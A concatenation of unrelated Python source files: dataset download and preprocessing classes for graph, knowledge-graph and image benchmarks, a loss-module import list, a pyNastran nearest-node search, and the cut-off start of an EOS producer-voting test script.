self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def test_preprocess(self, test_file):
train_file = test_file[:test_file.rfind("test.txt")] + "train.txt"
valid_file = test_file[:test_file.rfind("test.txt")] + "valid.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
class Youtube(Dataset):
"""
Youtube social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Youtube, self).__init__(
"youtube",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-groupmemberships.txt.gz"
}
)
def label_preprocess(self, raw_file, save_file):
self.top_k_label(raw_file, save_file, k=47)
class Flickr(Dataset):
"""
Flickr social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Flickr, self).__init__(
"flickr",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-groupmemberships.txt.gz"
}
)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=5)
class Hyperlink2012(Dataset):
"""
Hyperlink 2012 graph dataset.
Splits:
pld_train, pld_test
"""
def __init__(self):
super(Hyperlink2012, self).__init__(
"hyperlink2012",
urls={
"pld_train": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_valid": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_test": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz"
}
)
def pld_train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_valid.txt"
test_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_train.txt"
test_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_test_preprocess(self, graph_file, test_file):
train_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_train.txt"
valid_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_valid.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
class Friendster(Dataset):
"""
Friendster social network dataset.
Splits:
graph, small_graph, label
"""
def __init__(self):
super(Friendster, self).__init__(
"friendster",
urls={
"graph": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"small_graph": ["https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"https://snap.stanford.edu/data/bigdata/communities/com-friendster.all.cmty.txt.gz"],
"label": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.top5000.cmty.txt.gz"
}
)
def small_graph_preprocess(self, graph_file, label_file, save_file):
self.induced_graph(graph_file, label_file, save_file)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=100, format="(label)-nodes")
class Wikipedia(Dataset):
"""
Wikipedia dump for word embedding.
Splits:
graph
"""
def __init__(self):
super(Wikipedia, self).__init__(
"wikipedia",
urls={
"graph": "https://www.dropbox.com/s/mwt4uu1qu9fflfk/enwiki-latest-pages-articles-sentences.txt.gz?dl=1"
}
)
class Math(Dataset):
"""
Synthetic math knowledge graph dataset.
Splits:
train, valid, test
"""
NUM_ENTITY = 1000
NUM_RELATION = 30
OPERATORS = [
("+", lambda x, y: (x + y) % Math.NUM_ENTITY),
("-", lambda x, y: (x - y) % Math.NUM_ENTITY),
("*", lambda x, y: (x * y) % Math.NUM_ENTITY),
("/", lambda x, y: x // y),
("%", lambda x, y: x % y)
]
def __init__(self):
super(Math, self).__init__(
"math",
urls={
"train": [],
"valid": [],
"test": []
}
)
def train_preprocess(self, save_file):
np.random.seed(1023)
self.generate_math(save_file, num_triplet=20000)
def valid_preprocess(self, save_file):
np.random.seed(1024)
self.generate_math(save_file, num_triplet=1000)
def test_preprocess(self, save_file):
np.random.seed(1025)
self.generate_math(save_file, num_triplet=1000)
def generate_math(self, save_file, num_triplet):
with open(save_file, "w") as fout:
for _ in range(num_triplet):
i = int(np.random.rand() * len(self.OPERATORS))
op, f = self.OPERATORS[i]
x = int(np.random.rand() * self.NUM_ENTITY)
y = int(np.random.rand() * self.NUM_RELATION) + 1
fout.write("%d\t%s%d\t%d\n" % (x, op, y, f(x, y)))
class FB15k(Dataset):
"""
FB15k knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k, self).__init__(
"fb15k",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/test.txt"
}
)
class FB15k237(Dataset):
"""
FB15k-237 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k237, self).__init__(
"fb15k-237",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/test.txt"
}
)
class WN18(Dataset):
"""
WN18 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18, self).__init__(
"wn18",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/test.txt"
}
)
class WN18RR(Dataset):
"""
WN18RR knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18RR, self).__init__(
"wn18rr",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/test.txt"
}
)
class Wikidata5m(Dataset):
"""
Wikidata5m knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(Wikidata5m, self).__init__(
"wikidata5m",
urls={
"train": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"valid": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"test": "https://www.dropbox.com/s/dty6ufe1gg6keuc/wikidata5m.txt.gz?dl=1",
"entity": "https://www.dropbox.com/s/bgmgvk8brjwpc9w/entity.txt.gz?dl=1",
"relation": "https://www.dropbox.com/s/37jxki93gguv0pp/relation.txt.gz?dl=1",
"alias2entity": [], # depends on `entity`
"alias2relation": [] # depends on `relation`
}
)
def train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def test_preprocess(self, graph_file, test_file):
train_file = test_file[:test_file.rfind("valid.txt")] + "train.txt"
valid_file = test_file[:test_file.rfind("train.txt")] + "valid.txt"
self.edge_split(graph_file, [train_file, valid_file, test_file], portions=[4000, 1, 1])
def load_alias(self, alias_file):
alias2object = {}
ambiguous = set()
with open(alias_file, "r") as fin:
for line in fin:
tokens = line.strip().split("\t")
object = tokens[0]
for alias in tokens[1:]:
if alias in alias2object and alias2object[alias] != object:
ambiguous.add(alias)
alias2object[alias] = object
for alias in ambiguous:
alias2object.pop(alias)
return alias2object
def alias2entity_preprocess(self, save_file):
return self.load_alias(self.entity)
def alias2relation_preprocess(self, save_file):
return self.load_alias(self.relation)
class Freebase(Dataset):
"""
Freebase knowledge graph dataset.
Splits:
train
"""
def __init__(self):
super(Freebase, self).__init__(
"freebase",
urls={
"train": "http://commondatastorage.googleapis.com/freebase-public/rdf/freebase-rdf-latest.gz"
}
)
class MNIST(Dataset):
"""
MNIST dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(MNIST, self).__init__(
"mnist",
urls={
"train_image_data": "http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz",
"train_label_data": "http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz",
"test_image_data": "http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz",
"test_label_data": "http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
}
)
def train_image_data_preprocess(self, raw_file, save_file):
images = np.fromfile(raw_file, dtype=np.uint8)
return images[16:].reshape(-1, 28*28)
def train_label_data_preprocess(self, raw_file, save_file):
labels = np.fromfile(raw_file, dtype=np.uint8)
return labels[8:]
test_image_data_preprocess = train_image_data_preprocess
test_label_data_preprocess = train_label_data_preprocess
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
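# For reference (based on the standard MNIST layout): image_data has shape
# (70000, 784) -- 60000 train + 10000 test rows of flattened 28x28 pixels --
# and label_data has shape (70000,) with values 0-9.
# assert mnist.image_data.shape == (70000, 28 * 28)   # `mnist` is defined below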
class CIFAR10(Dataset):
"""
CIFAR10 dataset for visualization.
Splits:
train_image_data, train_label_data, test_image_data, test_label_data, image_data, label_data
"""
def __init__(self):
super(CIFAR10, self).__init__(
"cifar10",
urls={
"train_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"train_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_image_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"test_label_data": "https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
"image_data": [], # depends on `train_image_data` & `test_image_data`
"label_data": [] # depends on `train_label_data` & `test_label_data`
},
)
def load_images(self, *batch_files):
images = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
images.append(batch[:, 1:])
return np.concatenate(images)
def load_labels(self, meta_file, *batch_files):
classes = []
with open(meta_file, "r") as fin:
for line in fin:
line = line.strip()
if line:
classes.append(line)
classes = np.asarray(classes)
labels = []
for batch_file in batch_files:
batch = np.fromfile(batch_file, dtype=np.uint8)
batch = batch.reshape(-1, 32*32*3 + 1)
labels.append(batch[:, 0])
return classes[np.concatenate(labels)]
def train_image_data_preprocess(self, raw_path, save_file):
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_images(*batch_files)
def train_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_files = glob.glob(os.path.join(raw_path, "cifar-10-batches-bin/data_batch_*.bin"))
return self.load_labels(meta_file, *batch_files)
def test_image_data_preprocess(self, raw_path, save_file):
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_images(batch_file)
def test_label_data_preprocess(self, raw_path, save_file):
meta_file = os.path.join(raw_path, "cifar-10-batches-bin/batches.meta.txt")
batch_file = os.path.join(raw_path, "cifar-10-batches-bin/test_batch.bin")
return self.load_labels(meta_file, batch_file)
def image_data_preprocess(self, save_file):
return np.concatenate([self.train_image_data, self.test_image_data])
def label_data_preprocess(self, save_file):
return np.concatenate([self.train_label_data, self.test_label_data])
class ImageNet(Dataset):
"""
ImageNet dataset for visualization.
Splits:
train_image, train_feature_data, train_label, train_hierarchical_label,
valid_image, valid_feature_data, valid_label, valid_hierarchical_label
"""
def __init__(self):
super(ImageNet, self).__init__(
"imagenet",
urls={
"train_image": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_train.tar",
"train_feature_data": [], # depends on `train_image`
"train_label": [], # depends on `train_image`
"train_hierarchical_label": [], # depends on `train_image`
"valid_image": ["http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_img_val.tar",
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz"],
"valid_feature_data": [], # depends on `valid_image`
"valid_label": "http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"valid_hierarchical_label":
"http://www.image-net.org/challenges/LSVRC/2012/nnoupb/ILSVRC2012_devkit_t12.tar.gz",
"feature_data": [], # depends on `train_feature_data` & `valid_feature_data`
"label": [], # depends on `train_label` & `valid_label`
"hierarchical_label": [], # depends on `train_hierarchical_label` & `valid_hierarchical_label`
}
)
def import_wordnet(self):
import nltk
try:
nltk.data.find("corpora/wordnet")
except LookupError:
nltk.download("wordnet")
from nltk.corpus import wordnet
try:
wordnet.synset_from_pos_and_offset
except AttributeError:
wordnet.synset_from_pos_and_offset = wordnet._synset_from_pos_and_offset
return wordnet
def get_name(self, synset):
name = synset.name()
return name[:name.find(".")]
def readable_label(self, labels, save_file, hierarchy=False):
wordnet = self.import_wordnet()
if hierarchy:
logger.info("generating human-readable hierarchical labels")
else:
logger.info("generating human-readable labels")
synsets = []
for label in labels:
pos = label[0]
offset = int(label[1:])
synset = wordnet.synset_from_pos_and_offset(pos, offset)
synsets.append(synset)
depth = max([synset.max_depth() for synset in synsets])
num_sample = len(synsets)
labels = [self.get_name(synset) for synset in synsets]
num_class = len(set(labels))
hierarchies = [labels]
while hierarchy and num_class > 1:
depth -= 1
for i in range(num_sample):
if synsets[i].max_depth() > depth:
# only take the first hypernym when a synset has several
synsets[i] = synsets[i].hypernyms()[0]
labels = [self.get_name(synset) for synset in synsets]
hierarchies.append(labels)
num_class = len(set(labels))
hierarchies = hierarchies[::-1]
with open(save_file, "w") as fout:
for hierarchy in zip(*hierarchies):
fout.write("%s\n" % "\t".join(hierarchy))
def image_feature_data(self, image_path):
""""""
import torchvision
from torchvision import transforms
augmentation = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
dataset = torchvision.datasets.ImageFolder(image_path, augmentation)
features = super(ImageNet, self).image_feature_data(dataset)
return features
def train_image_preprocess(self, image_path, save_file):
tar_files = glob.glob(os.path.join(image_path, "*.tar"))
if len(tar_files) == 0:
return image_path
for tar_file in tar_files:
self.extract(tar_file)
os.remove(tar_file)
return image_path
def train_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.train_image)
np.save(numpy_file, features)
return features
def train_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def train_hierarchical_label_preprocess(self, save_file):
image_files = glob.glob(os.path.join(self.train_image, "*/*.JPEG"))
labels = [os.path.basename(os.path.dirname(image_file)) for image_file in image_files]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def valid_image_preprocess(self, image_path, meta_path, save_file):
from scipy.io import loadmat
image_files = glob.glob(os.path.join(image_path, "*.JPEG"))
if len(image_files) == 0:
return image_path
logger.info("re-arranging images into sub-folders")
image_files = sorted(image_files)
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file)
labels = [id2class[id] for id in ids]
for image_file, label in zip(image_files, labels):
class_path = os.path.join(image_path, label)
if not os.path.exists(class_path):
os.mkdir(class_path)
shutil.move(image_file, class_path)
return image_path
def valid_feature_data_preprocess(self, save_file):
numpy_file = os.path.splitext(save_file)[0] + ".npy"
if os.path.exists(numpy_file):
return np.load(numpy_file)
features = self.image_feature_data(self.valid_image)
np.save(numpy_file, features)
return features
def valid_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file)
def valid_hierarchical_label_preprocess(self, meta_path, save_file):
from scipy.io import loadmat
meta_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/meta.mat")
id_file = os.path.join(meta_path, "ILSVRC2012_devkit_t12/data/ILSVRC2012_validation_ground_truth.txt")
metas = loadmat(meta_file, squeeze_me=True)["synsets"][:1000]
id2class = {meta[0]: meta[1] for meta in metas}
ids = np.loadtxt(id_file, dtype=np.int32)
labels = [id2class[id] for id in ids]
# be consistent with the order in torch.utils.data.DataLoader
labels = sorted(labels)
self.readable_label(labels, save_file, hierarchy=True)
def feature_data_preprocess(self, save_file):
return np.concatenate([self.train_feature_data, self.valid_feature_data])
def label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(save_file, "a") as fout:
with open(self.valid_label, "r") as fin:
shutil.copyfileobj(fin, fout)
def hierarchical_label_preprocess(self, save_file):
with open(save_file, "w") as fout:
with open(self.train_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
with open(self.valid_hierarchical_label, "r") as fin:
shutil.copyfileobj(fin, fout)
blogcatalog = BlogCatalog()
youtube = Youtube()
flickr = Flickr()
hyperlink2012 = Hyperlink2012()
friendster = Friendster()
wikipedia = Wikipedia()
math = Math()
fb15k = FB15k()
fb15k237 = FB15k237()
wn18 = WN18()
wn18rr = WN18RR()
wikidata5m = Wikidata5m()
freebase = Freebase()
mnist = MNIST()
cifar10 = CIFAR10()
imagenet = ImageNet()
__all__ = [
"Dataset",
"BlogCatalog", "Youtube", "Flickr", "Hyperlink2012", "Friendster", "Wikipedia",
"Math", "FB15k", "FB15k237", "WN18", "WN18RR", "Wikidata5m", "Freebase",
"MNIST", "CIFAR10", "ImageNet"
] |
py | 1a32f5484006bad6e61c4b7f46ef1fca3775a43b | from .accuracy import Accuracy, accuracy
from .balanced_l1_loss import BalancedL1Loss, balanced_l1_loss
from .cross_entropy_loss import (CrossEntropyLoss, binary_cross_entropy,
cross_entropy, mask_cross_entropy)
from .focal_loss import FocalLoss, sigmoid_focal_loss
from .ghm_loss import GHMC, GHMR
from .iou_loss import (BoundedIoULoss, GIoULoss, IoULoss, bounded_iou_loss,
iou_loss)
from .mse_loss import MSELoss, mse_loss
from .smooth_l1_loss import SmoothL1Loss, smooth_l1_loss
from .utils import reduce_loss, weight_reduce_loss, weighted_loss
from .supervised_contrastive_loss import (SupContrastLoss, SupContrastNegLoss,
CurContrastLoss, CurContrastNegLoss)
from .angular_margin_loss import (ArcFaceLoss, ArcFaceFocalLoss,
CurricularLoss, FocalCurricularLoss)
__all__ = [
'accuracy', 'Accuracy', 'cross_entropy', 'binary_cross_entropy',
'mask_cross_entropy', 'CrossEntropyLoss', 'sigmoid_focal_loss',
'FocalLoss', 'smooth_l1_loss', 'SmoothL1Loss', 'balanced_l1_loss',
'BalancedL1Loss', 'mse_loss', 'MSELoss', 'iou_loss', 'bounded_iou_loss',
'IoULoss', 'BoundedIoULoss', 'GIoULoss', 'GHMC', 'GHMR', 'reduce_loss',
'weight_reduce_loss', 'weighted_loss', 'SupContrastLoss',
'SupContrastNegLoss', 'CurContrastLoss', 'CurContrastNegLoss',
'ArcFaceLoss', 'ArcFaceFocalLoss', 'CurricularLoss', 'FocalCurricularLoss',
]
|
py | 1a32f7003e0ee0d2444b96b1522dd9b6b3e41910 | """
defines:
* nids_close = find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max, tol)
* ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
"""
from itertools import count
from typing import Any, Optional
import numpy as np
from pyNastran.bdf.mesh_utils.bdf_equivalence import (
_get_tree)
def find_closest_nodes(nodes_xyz, nids, xyz_compare, neq_max=1, tol=None, msg=''):
# type: (np.ndarray, np.ndarray, np.ndarray, int, Optional[float], str) -> np.ndarray
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points (e.g., xyz_cid0)
nids : (Nnodes, ) int ndarray
the source node ids (e.g.; nid_cp_cid[:, 0])
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to; xyz_to_find
tol : float; default=None
the max spherical tolerance
None : the whole model
neq_max : int; default=1
the number of "close" points
msg : str; default=''
custom message used for errors
Returns
-------
nids_close: (Ncompare, ) int ndarray
the close node ids
"""
if not isinstance(neq_max, int):
msgi = 'neq_max=%r must be an int; type=%s\n%s' % (
neq_max, type(neq_max), msg)
raise TypeError(msgi)
#ieq = find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol)
if tol is None:
xyz_max = nodes_xyz.max(axis=0)
xyz_min = nodes_xyz.min(axis=0)
assert len(xyz_max) == 3, xyz_max
dxyz = np.linalg.norm(xyz_max - xyz_min)
tol = 2. * dxyz
ieq = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1]
ncompare = xyz_compare.shape[0]
assert len(ieq) == ncompare, 'increase the tolerance so you can find nodes; tol=%r' % tol
try:
nids_out = nids[ieq]
except IndexError:
# if you get a crash while trying to create the error message
# check to see if your nodes are really far from each other
#
nnids = len(nids)
msgi = 'Cannot find:\n'
for i, ieqi, nid in zip(count(), ieq, nids):
if ieqi == nnids:
xyz = xyz_compare[i, :]
msgi += ' nid=%s xyz=%s\n' % (nid, xyz)
msgi += msg
raise IndexError(msgi)
return nids_out
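# Usage sketch (hypothetical coordinates and node ids):
# import numpy as np
# nodes_xyz = np.array([[0., 0., 0.], [1., 0., 0.], [0., 1., 0.]])
# nids = np.array([10, 20, 30])
# xyz_compare = np.array([[0.9, 0.1, 0.]])
# find_closest_nodes(nodes_xyz, nids, xyz_compare)  # -> array([20])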
def find_closest_nodes_index(nodes_xyz, xyz_compare, neq_max, tol, msg=''):
"""
Finds the closest nodes to an arbitrary set of xyz points
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
neq_max : int
the number of "close" points (default=4)
tol : float
the max spherical tolerance
msg : str; default=''
error message
Returns
-------
ieq : (Ncompare, ) or (Ncompare, neq_max) int ndarray
the indices into nodes_xyz of the closest node(s) for each compare point
"""
#nodes_xyz, model, nids, inew = _eq_nodes_setup(
#bdf_filename, tol, renumber_nodes=renumber_nodes,
#xref=xref, node_set=node_set, debug=debug)
ieq, slots = _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol,
neq_max=neq_max, msg=msg)[1:3]
return ieq
def _not_equal_nodes_build_tree(nodes_xyz, xyz_compare, tol, neq_max=4, msg=''):
# type: (np.ndarray, np.ndarray, float, int, str) -> (Any, np.ndarray, np.ndarray)
"""
helper function for `bdf_equivalence_nodes`
Parameters
----------
nodes_xyz : (Nnodes, 3) float ndarray
the source points
xyz_compare : (Ncompare, 3) float ndarray
the xyz points to compare to
tol : float
the max spherical tolerance
neq_max : int; default=4
the number of close nodes
msg : str; default=''
error message
Returns
-------
kdt : cKDTree()
the kdtree object
ieq : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
slots : int ndarray
The indices of nodes_xyz where the nodes in xyz_compare are close???
neq_max = 1:
(N, ) int ndarray
neq_max > 1:
(N, N) int ndarray
msg : str; default=''
error message
"""
assert isinstance(xyz_compare, np.ndarray), type(xyz_compare)
if nodes_xyz.shape[1] != xyz_compare.shape[1]:
msgi = 'nodes_xyz.shape=%s xyz_compare.shape=%s%s' % (
str(nodes_xyz.shape), str(xyz_compare.shape), msg)
raise RuntimeError(msgi)
kdt = _get_tree(nodes_xyz, msg=msg)
    # check the closest neq_max nodes for equality
deq, ieq = kdt.query(xyz_compare, k=neq_max, distance_upper_bound=tol)
#print(deq)
#print('ieq =', ieq)
#print('neq_max = %s' % neq_max)
# get the ids of the duplicate nodes
nnodes = nodes_xyz.shape[0]
if neq_max == 1:
assert len(deq.shape) == 1, deq.shape
slots = np.where(ieq < nnodes)
else:
assert len(deq.shape) == 2, deq.shape
slots = np.where(ieq[:, :] < nnodes)
#print('slots =', slots)
return kdt, ieq, slots
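# Minimal usage sketch (illustrative data only; assumes scipy is available for the kd-tree):
# three source grid points are searched for the nearest neighbor of two query points.
if __name__ == '__main__':  # pragma: no cover
    demo_nodes = np.array([[0., 0., 0.],
                           [1., 0., 0.],
                           [0., 1., 0.]])
    demo_nids = np.array([1, 2, 3])
    demo_xyz_to_find = np.array([[0.1, 0.1, 0.],
                                 [0.9, 0.1, 0.]])
    # expected output: [1 2] (node 1 is closest to the first point, node 2 to the second)
    print(find_closest_nodes(demo_nodes, demo_nids, demo_xyz_to_find, neq_max=1))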
|
py | 1a32f710f4dbcc5dcc80b60e1ab5d7d37f944250 | #!/usr/bin/env python3
from testUtils import Utils
import testUtils
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import Node
from TestHelper import TestHelper
import decimal
import math
import re
import time
###############################################################
# nodeos_voting_test
# --dump-error-details <Upon error print etc/eosio/node_*/config.ini and var/lib/node_*/stderr.log to stdout>
# --keep-logs <Don't delete var/lib/node_* folders upon test completion>
###############################################################
class ProducerToNode:
map={}
@staticmethod
def populate(node, num):
for prod in node.producers:
ProducerToNode.map[prod]=num
Utils.Print("Producer=%s for nodeNum=%s" % (prod,num))
def isValidBlockProducer(prodsActive, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
return False
return prodsActive[blockProducer]
def validBlockProducer(prodsActive, prodsSeen, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
Utils.cmdError("unexpected block producer %s at blockNum=%s" % (blockProducer,blockNum))
Utils.errorExit("Failed because of invalid block producer")
if not prodsActive[blockProducer]:
Utils.cmdError("block producer %s for blockNum=%s not elected, belongs to node %s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
Utils.errorExit("Failed because of incorrect block producer")
prodsSeen[blockProducer]=True
def setActiveProducers(prodsActive, activeProducers):
for prod in prodsActive:
prodsActive[prod]=prod in activeProducers
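# Note: verifyProductionRounds below relies on the schedule in which each of the 21 active
# producers signs 12 consecutive blocks, i.e. one full round is 21 * 12 = 252 blocks; the nested
# loops (j over 21 producers, k over 12 blocks) mirror that layout.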
def verifyProductionRounds(trans, node, prodsActive, rounds):
blockNum=node.getNextCleanProductionCycle(trans)
Utils.Print("Validating blockNum=%s" % (blockNum))
temp=Utils.Debug
Utils.Debug=False
Utils.Print("FIND VALID BLOCK PRODUCER")
blockProducer=node.getBlockProducerByNum(blockNum)
lastBlockProducer=blockProducer
adjust=False
while not isValidBlockProducer(prodsActive, blockNum, node):
adjust=True
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
Utils.Print("blockProducer=%s for blockNum=%s is for node=%s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
lastBlockProducer=blockProducer
blockNum+=1
Utils.Print("VALID BLOCK PRODUCER")
saw=0
sawHigh=0
startingFrom=blockNum
doPrint=0
invalidCount=0
while adjust:
invalidCount+=1
if lastBlockProducer==blockProducer:
            saw+=1
else:
if saw>=12:
startingFrom=blockNum
if saw>12:
Utils.Print("ERROR!!!!!!!!!!!!!! saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
break
else:
if saw > sawHigh:
sawHigh = saw
Utils.Print("sawHigh=%s" % (sawHigh))
if doPrint < 5:
doPrint+=1
Utils.Print("saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
lastBlockProducer=blockProducer
saw=1
blockProducer=node.getBlockProducerByNum(blockNum)
blockNum+=1
if adjust:
blockNum-=1
Utils.Print("ADJUSTED %s blocks" % (invalidCount-1))
prodsSeen=None
Utils.Print("Verify %s complete rounds of all producers producing" % (rounds))
for i in range(0, rounds):
prodsSeen={}
lastBlockProducer=None
for j in range(0, 21):
# each new set of 12 blocks should have a different blockProducer
